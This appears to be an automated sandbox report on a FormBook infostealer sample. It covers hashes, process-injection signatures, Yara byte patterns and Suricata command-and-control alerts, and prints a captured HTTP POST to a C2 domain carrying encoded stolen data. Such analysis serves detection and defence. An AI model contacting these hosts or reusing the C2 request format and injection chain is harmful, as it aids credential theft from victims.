Edit tour

Windows Analysis Report
9B1ZyhsFUq.exe

Overview

General Information

Sample name:	9B1ZyhsFUq.exe renamed because original name is a hash value
Original sample name:	d1743c107eedb9e740537df6cd35db93dd2a45ea952f4712ca134846dba1c7e5.exe
Analysis ID:	1483420
MD5:	0c7b233a4bf0fc22c9e2a49818bc90a1
SHA1:	026eeec2d42c9f20c66e9c9bd52f495e83a689f0
SHA256:	d1743c107eedb9e740537df6cd35db93dd2a45ea952f4712ca134846dba1c7e5
Tags:	exeinvestdirectinsurance-com
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

9B1ZyhsFUq.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\9B1ZyhsFUq.exe" MD5: 0C7B233A4BF0FC22C9E2A49818BC90A1)

MSBuild.exe (PID: 8172 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe (PID: 892 cmdline: "C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

convert.exe (PID: 7644 cmdline: "C:\Windows\SysWOW64\convert.exe" MD5: 2B1AC34AB72C95793CFE7E936F15389D)

nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe (PID: 5904 cmdline: "C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a830:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a830:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6c8c5:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x55ee4:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2686ea:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x251d09:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a830:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a830:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2686ea:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x251d09:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.MSBuild.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.MSBuild.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cfa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x165c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 203.161.43.228

Timestamp:	2024-07-27T11:40:41.367654+0200
SID:	2855464
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.10 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T11:40:32.769255+0200
SID:	2855465
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T11:40:25.161713+0200
SID:	2855464
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 38.47.158.215

Timestamp:	2024-07-27T11:40:55.569047+0200
SID:	2855464
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T11:41:09.490501+0200
SID:	2855464
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T11:40:27.702875+0200
SID:	2855464
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.10 - Destination IP: 203.161.43.228

Timestamp:	2024-07-27T11:40:46.414120+0200
SID:	2855465
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.10

Timestamp:	2024-07-27T11:39:59.149683+0200
SID:	2022930
Source Port:	443
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.10

Timestamp:	2024-07-27T11:39:20.746813+0200
SID:	2022930
Source Port:	443
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 203.161.43.228

Timestamp:	2024-07-27T11:40:43.923573+0200
SID:	2855464
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.10 - Destination IP: 38.47.158.160

Timestamp:	2024-07-27T11:40:01.487944+0200
SID:	2855465
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.10 - Destination IP: 38.47.158.215

Timestamp:	2024-07-27T11:41:00.657074+0200
SID:	2855465
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 203.161.43.228

Timestamp:	2024-07-27T11:40:38.802513+0200
SID:	2855464
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T11:41:06.189487+0200
SID:	2855464
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 38.47.158.215

Timestamp:	2024-07-27T11:40:58.796775+0200
SID:	2855464
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T11:40:30.225966+0200
SID:	2855464
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.10 - Destination IP: 38.47.158.215

Timestamp:	2024-07-27T11:40:53.249832+0200
SID:	2855464
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /r4rr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 194Host: www.d99qtpkvavjj.xyzOrigin: http://www.d99qtpkvavjj.xyzReferer: http://www.d99qtpkvavjj.xyz/r4rr/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 6f 64 6c 58 56 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 6a 69 4b 51 66 70 77 2f 35 30 62 70 69 43 69 6a 59 37 5a 43 33 39 44 59 46 76 55 44 77 4c 4a 50 37 4a 64 4b 77 4a 71 70 4f 70 50 77 59 64 71 67 32 62 52 57 53 36 54 5a 5a 48 4e 6d 48 48 74 70 4a 67 4e 44 79 77 5a 36 34 4b 57 53 54 66 66 6e 4e 35 53 49 32 61 6d 67 57 59 67 66 46 69 4f 48 34 66 6b 67 44 52 50 76 73 74 68 38 55 69 4b 71 6b 69 6d 56 33 36 32 46 4b 52 42 4f 65 48 58 79 46 59 53 63 62 45 6d 54 78 65 78 67 5a 75 6e 49 76 2f 43 4d 7a 51 61 54 48 68 58 48 37 6c 34 6f 78 50 68 70 4b 6b 42 2f 70 68 66 6b 61 4c 6d 4c Data Ascii: odlXV=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzQaTHhXH7l4oxPhpKkB/phfkaLmL

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:38 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:41 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:43 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:46 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>

Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.0000000003170000.00000004.00000800.00020000.00000000.sdmp, 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.00000000030E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2514005145.0000000004B9D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.theridleysuk.co.uk
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2514005145.0000000004B9D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.theridleysuk.co.uk/frbh/
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: convert.exe, 0000000B.00000002.2512955277.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.0000000002F7A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
